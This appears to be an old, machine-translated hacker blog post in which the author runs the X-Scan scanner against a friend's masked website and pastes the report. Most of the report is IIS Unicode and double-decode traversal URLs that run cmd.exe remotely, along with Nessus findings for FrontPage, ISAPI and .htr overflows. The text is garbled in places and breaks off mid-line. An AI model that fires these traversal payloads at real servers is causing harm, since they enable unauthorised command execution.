Use X-Scan to find ASP Trojan Horse Backdoors

Today, I am bored and can't even go back to my home ~~ A friend calls a test site

Open the address !! Maybe it's hard for him to open the address:

[[The website you want to connect to is being established. Currently, there is no website details page. It may be being upgraded.

Please try again later. If the problem persists, contact the website administrator. ]

Haha !!

I'm not afraid of an old saying that I won't scan it. That's not it.
A real hacker

Come to X-Scan.
****.**.**.**

The scan results are as follows:

X-Scan detection report
------------------

Detection Result

-Active HOST: 1
-Number of vulnerabilities: 22
-Warning count: 16
-Number of prompts: 6

Host list

* **. ** (Security Vulnerability Detected)
. OS: Windows; PORT/TCP: 21, 25, 53, 80,443

Details

****.**.**.**:
. Open Port list:
O smtp (25/tcp) (Security Warning discovered)
O domain (53/tcp) (Security Prompt discovered)
O www (80/tcp) (security vulnerability discovered)
O https (443/tcp) (Security Prompt discovered)
O ftp (21/tcp) (Security Prompt discovered)

. Port "smtp (25/tcp)" Security Warning discovered:

The SMTP server does not support user authentication and allows anonymous users to use it.

. Port "smtp (25/tcp)" Security Prompt:

A smtp server is running on this port
Here is its banner:
220 altsyz-web Microsoft esmtp mail Service, Version: 5.0.2195.2966 ready
Wed, 20 Oct 2004 06:28:38 + 0800
NESSUS_ID: 10330

. Port "domain (53/tcp)" Security Prompt:

Maybe the "domain" service running on this port.

NESSUS_ID: 10330

. Port "www (80/tcp)" security vulnerability discovered:
IIS encoding/Decoding Vulnerability:
Http: // *****. **/scripts/. % 25% 35% 63 .. % 25% 35% 63 winnt/system32/cmd.exe? /C + dir

. Port "www (80/tcp)" security vulnerability discovered:

IIS encoding/Decoding Vulnerability:
Http: // *****. **/scripts/. % 35c .. % 35 cwinnt/system32/cmd.exe? /C + di
. Port "www (80/tcp)" security vulnerability discovered:

IIS encoding/Decoding Vulnerability:
Http: // *****. **/scripts/. % 35% 63.% 35% 63 winnt/system32/cmd.exe? /C + dir

. Port "www (80/tcp)" security vulnerability discovered:

IIS encoding/Decoding Vulnerability:
Http: // *****. **/scripts/... % 255c... % 255 cwinnt/system32/cmd.exe? /C + dir

. Port "www (80/tcp)" security vulnerability discovered:

IIS encoding/Decoding Vulnerability:
Http ://****. **. **. **/scripts /.. % 35% 63 .. % 35% 63 .. % 35% 63 .. % 35% 63 .. % 35% 63 winnt/system32/cmd.exe? /C + dir

. Port "www (80/tcp)" security vulnerability discovered:

IIS encoding/Decoding Vulnerability:
Http ://****. **. **. **/scripts /.. % 35c .. % 35c .. % 35c .. % 35c .. % 35 cwinnt/system32/cmd.exe? /C + dir

. Port "www (80/tcp)" security vulnerability discovered:

IIS encoding/Decoding Vulnerability:
Http ://****. **. **. **/scripts /.. % 25% 35% 63 .. % 25% 35% 63 .. % 25% 35% 63 .. % 25% 35% 63 .. % 25% 35% 63 winnt/system32/cmd.exe? /C + dir

. Port "www (80/tcp)" security vulnerability discovered:

IIS encoding/Decoding Vulnerability:
Http ://****. **. **. **/scripts /.. % 255c .. % 255c .. % 255c .. % 255c .. % 255 cwinnt/system32/cmd.exe? /C + dir

. Port "www (80/tcp)" security vulnerability discovered:

IIS encoding/Decoding Vulnerability:
Http ://****. **. **. **/scripts /.. % 35% 63 .. % 35% 63 .. % 35% 63 .. % 35% 63 .. % 35% 63 .. % 35% 63 winnt/system32/cmd.exe? /C + dir

. Port "www (80/tcp)" security vulnerability discovered:

IIS encoding/Decoding Vulnerability:
Http ://****. **. **. **/scripts /.. % 35c .. % 35c .. % 35c .. % 35c .. % 35c .. % 35 cwinnt/system32/cmd.exe? /C + dir

. Port "www (80/tcp)" security vulnerability discovered:

IIS encoding/Decoding Vulnerability:
Http ://****. **. **. **/scripts /.. % 25% 35% 63 .. % 25% 35% 63 .. % 25% 35% 63 .. % 25% 35% 63 .. % 25% 35% 63 .. % 25% 35% 63 winnt/system32/cmd.exe? /C + dir

. Port "www (80/tcp)" security vulnerability discovered:

IIS encoding/Decoding Vulnerability:
Http ://****. **. **. **/scripts /.. % 255c .. % 255c .. % 255c .. % 255c .. % 255c .. % 255 cwinnt/system32/cmd.exe? /C + dir

. Port "www (80/tcp)" security vulnerability discovered:

IIS encoding/Decoding Vulnerability:
Http: // *****. **/scripts/... % u00255c .. % u00255cwinnt/system32/cmd.exe? /C + dir

. Port "www (80/tcp)" security vulnerability discovered:

IIS encoding/Decoding Vulnerability:
Http ://****. **. **. **/scripts /.. % u00255c .. % u00255c .. % u00255c .. % u00255c .. % u00255cwinnt/system32/cmd.exe? /C + dir

. Port "www (80/tcp)" security vulnerability discovered:

IIS encoding/Decoding Vulnerability:

. Port "www (80/tcp)" security vulnerability discovered:

The remote Microsoft Frontpage server seems vulnerable to a remote
Buffer overflow. Exploitation of this bug cocould give an unauthorized
User access to the machine.

The following systems are known to be vulnerable:

Microsoft Windows 2000 Service Pack 2, Service Pack 3
Microsoft Windows XP, Microsoft Windows XP Service Pack 1
Microsoft Office XP, Microsoft Office XP Service Release 1

Solution: Install relevant service pack or hotfix from URL below.

See als
Http://www.microsoft.com/technet/security/bulletin/ms03-051.mspx

Risk factor: High
CVE_ID: CAN-2003-0822, CAN-2003-0824
NESSUS_ID: 11923
Other references: IAVA: 2003-A-0033

 

. Port "www (80/tcp)" security vulnerability discovered:

 

 

Theres a buffer overflow in the remote web server through
The ISAPI filter.

It is possible to overflow the remote web server and execute
Commands as user SYSTEM.

Solution: See
Http://www.microsoft.com/technet/security/bulletin/ms01-044.mspx
Risk factor: High
CVE_ID: CVE-2001-0544, CVE-2001-0545, CVE-2001-0506, CVE-2001-0507,
CVE-2001-0508, CVE-2001-0500
BUGTRAQ_ID: 2690,319 0, 3194,319 5
NESSUS_ID: 10685

 

. Port "www (80/tcp)" security vulnerability discovered:

 

 

The IIS server appears to have the. htr isapi filter mapped.

At least one remote vulnerability has been discovered for the. HTR
Filter. This is detailed in Microsoft Advisory
MS02-018, and gives remote SYSTEM level access to the web server.

It is recommended that, even if you have patched this vulnerability,
You unmap the. HTR extension and any other unused ISAPI extensions
If they are not required for the operation of your site.

Solution:
To unmap the. HTR extension:
1. Open Internet Services Manager.
2. Right-click the Web server choose Properties from the context menu.
3. Master Properties
4. Select WWW Service-> Edit-> HomeDirectory-> Configuration
And remove the reference to. htr from the list.

In addition, you may wish to download and install URLSCAN from
Microsoft Technet Website. URLSCAN, by default, blocks all requests
For. htr files.

Risk factor: High
CVE_ID: CVE-2002-0071
BUGTRAQ_ID: 4474
NESSUS_ID: 10932
Other ref